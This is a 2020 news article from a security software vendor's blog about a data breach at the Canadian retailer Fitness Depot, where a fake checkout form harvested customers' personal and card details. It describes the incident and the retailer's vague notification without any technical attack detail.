Cybercriminals Used a Fake Form to Steal Fitness Depot Customers' Information

Fitness Depot Data Breach

The COVID-19 pandemic means that many people have a lot of free time and one fewer excuse for not working out. The gyms are closed, but there are plenty of online shops that sell fitness equipment and enable people to stay in shape during the lockdown. A cybercriminal gang spotted this and had no problems picking its next target.

Fitness Depot is a large Canadian sports equipment retailer that's been in the business for over 20 years, according to its website. It has dozens of brick and mortar outlets throughout Canada, but understandably, over the last few months, the focus has been on the ecommerce side of the business. Unfortunately, people who decided to buy fitness equipment from Fitness Depot's online store between February and May could have had their personal data stolen.

Fitness Depot reports a security incident

Nothing on Fitness Depot's website or official social media channels could lead you to believe that the retailer was targeted by hackers. Some of its customers, however, recently started receiving data breach notifications in their inbox, which suggest that the attack on Fitness Depot was actually pretty serious.

Apparently, cybercriminals first compromised Fitness Depot's ecommerce platform on February 18. They uploaded and redirected users to a "misleading" checkout form that harvested all the information entered on it, including names, email and physical addresses, telephone numbers, and credit card details.

Initially, the fake page affected only home delivery customers, but on April 28, the crooks updated the form, and it started targeting users who have opted for the in-store pick-up option as well. When they finally learned about the breach on May 22, Fitness Depot's IT specialists temporarily closed the online shop and took remediating actions. They now "believe" that the cybercriminals' access has been cut.

Was it Magecart?

The attack bears all the characteristics of a classic Magecart operation, but it's impossible to say with absolute certainty what it was because quite a few pieces of the puzzle are missing. On the whole, Fitness Depot's data breach notification is pretty uninformative.

We don't know, for example, how many people could have been affected by the breach. We also have no idea why it took the retailer three full months to learn that someone had compromised its website, and we can't be sure if it plans to help victims by offering to pay for identity theft protection services.

Fitness Depot seems to know who's to blame for the whole thing, though. An investigation apparently revealed that the retailer's ISP had "neglected to activate the anti-virus software" on its account. The notification doesn't say what sort of anti-virus software is supposed to protect the online shop, and there's no information on why a retailer selling hundreds of items to hundreds of thousands of users had to suffer a data breach in order to find out that its website was not secure.

By Duran
June 9, 2020
News
English
June 9, 2020
News

Popular Posts

As Fears of the Coronavirus Pandemic Spread, So Does...

4 years ago

Microsoft Warns State-Backed Threat Actors Are Using AI in...

4 days ago

Trojan Al11 Malware Detection & Removal - An Essential...

11 months ago

Pinaview is a Fully-Featured Adware App

10 months ago

"Your iCloud is Being Hacked" and "Your iPhone has Been...

7 months ago

What is Lucky Ransomware?

7 months ago

Related Posts

News

Customers' Personal Information Might Have Been Exposed in an Amtrak Data Breach

Last week, The National Railroad Passenger Corporation or Amtrak, as it's better known, filed a data breach notification with the Office of the Vermont Attorney General, and it also started sending it to some of its... Read more

June 2, 2020
News

Cybercriminals Distribute the AZORult Information Stealer With the Help of a Coronavirus Map

You'd think that in the age of the internet, the distribution of truthful information, especially regarding events with worldwide impact, would be reliable and quick, but the reality is quite a bit different. Take the... Read more

March 11, 2020
Malware

Macy's Customers Start Receiving Information on How to Protect Their Accounts After a Data Breach

Surveys suggest that according to users, businesses are responsible for protecting people's personal information and should take all the responsibility after they suffer a data breach. Sometimes, however, things... Read more

November 21, 2019
English
Loading...

Cyclonis Backup Details & Terms

The Free Basic Cyclonis Backup plan gives you 2 GB of cloud storage space with full functionality! No credit card required. Need more storage space? Purchase a larger Cyclonis Backup plan today! To learn more about our policies and pricing, see Terms of Service, Privacy Policy, Discount Terms and Purchase Page. If you wish to uninstall the app, please visit the Uninstallation Instructions page.

Cyclonis Password Manager Details & Terms

FREE Trial: 30-Day One-Time Offer! No credit card required for Free Trial. Full functionality for the length of the Free Trial. (Full functionality after Free Trial requires subscription purchase.) To learn more about our policies and pricing, see EULA, Privacy Policy, Discount Terms and Purchase Page. If you wish to uninstall the app, please visit the Uninstallation Instructions page.

Home

Products

Cyclonis Backup Cyclonis Password Manager Cyclonis World Time

Support

Help Files FAQs Downloads Inquiries & Support

Company

About Us Contact Us Report Abuse

Legal (Post Merger)

EnigmaSoft Limited (fka Cyclonis Limited)

Cyclonis Backup's Terms of Service Cyclonis Password Manager's EULA Cyclonis World Time's Terms of Service Privacy Policy Cookie Policy Special Discount Offer Terms Additional Terms & Conditions SpyHunter EULA RegHunter EULA EnigmaSoft Privacy Policy & Cookie Policy ESG Privacy Policy & Cookie Policy EnigmaSoft Discount Offer Terms ESG Discount Offer Terms

© 2017-2024 Cyclonis Ltd. CYCLONIS is a trademark of EnigmaSoft Limited (Cyclonis was merged into EnigmaSoft Limited effective November 25, 2023.) All rights reserved.

Registered Office EnigmaSoft Limited: 1 Castle Street, 3rd Floor, Dublin 2 D02 XD82, Ireland.
EnigmaSoft Limited, Private Company Limited by shares, Company Registration Number 597114.

Windows is a trademark of Microsoft, registered in the U.S. and other countries.
Mac, iPhone, iPad and App Store are trademarks of Apple Inc., registered in the U.S. and other countries.
iOS is a registered trademark of Cisco Systems, Inc. and/or its affiliates in the United States and certain other countries.
Android and Google Play are trademarks of Google LLC.